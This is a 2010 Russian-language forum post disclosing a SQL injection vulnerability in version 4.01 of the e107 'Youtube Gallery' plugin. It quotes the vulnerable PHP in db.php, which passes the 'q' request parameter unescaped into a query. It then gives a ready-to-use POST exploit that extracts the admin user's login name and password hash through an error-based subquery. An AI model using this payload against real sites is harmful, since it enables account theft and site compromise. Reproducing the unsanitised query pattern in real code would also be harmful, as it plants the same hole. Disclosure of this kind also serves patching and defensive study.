Показать сообщение отдельно
Старый 05.07.2010, 12:19   #3
RulleR
 
Аватар для RulleR
 
Регистрация: 04.07.2010
Сообщений: 39
Репутация: 58
По умолчанию e107 Plugin [Youtube Gallery] Blind SQL injection Vulnerability

Plugin name: Youtube Gallery (download)
Version: 4.01

Blind SQL injection

Vuln file: /e107_plugins/ytm_gallery/db.php
PHP код:
/*...*/
header("Cache-Control: no-cache");
header("Pragma: nocache");
require_once(
"../../class2.php");
/*...*/
$id_sent $_REQUEST['q'];
/*...*/
$query mysql_query("SELECT total_votes, total_value, used_ips FROM $rating_dbname.$rating_tableName WHERE id='$id_sent' ")or die(" Error: ".mysql_error());
/*...*/ 
Need: magic_quotes = off
Exploit:
Код:
POST http://[host]/[path]/e107_plugins/ytm_gallery/db.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

q=' and (select+*+from+(select+count(*),concat((select concat_ws(0x3a,user_loginname,user_password) from e107_user where user_id=1),floor(rand(0)*2)) from e107_links group by 2)x)--
RulleR вне форума   Ответить с цитированием